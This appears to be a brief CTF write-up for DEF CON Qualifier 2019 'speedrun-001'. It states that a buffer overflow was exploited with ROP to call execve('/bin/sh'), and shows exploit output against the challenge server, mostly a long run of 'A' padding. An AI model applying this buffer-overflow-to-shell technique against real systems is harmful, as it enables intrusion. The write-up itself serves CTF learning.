DEF CON CTF Qualifier 2019 speedrun-001~003
speedrun-001
$ ./speedrun-001
Hello brave new challenger
Any last words?
hoge
This will be the last thing that you say: hoge
Alas, you had no luck today.
There is a buffer overflow, so I used ROP to call execve("/bin/sh", NULL, NULL).
$ python exploit.py
[+] Opening connection to speedrun-001.quals2019.oooverflow.io on port 31337: Done
Hello brave new challenger
Any last words?
[*] Switching to interactive mode
This will be the last thing that you say: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA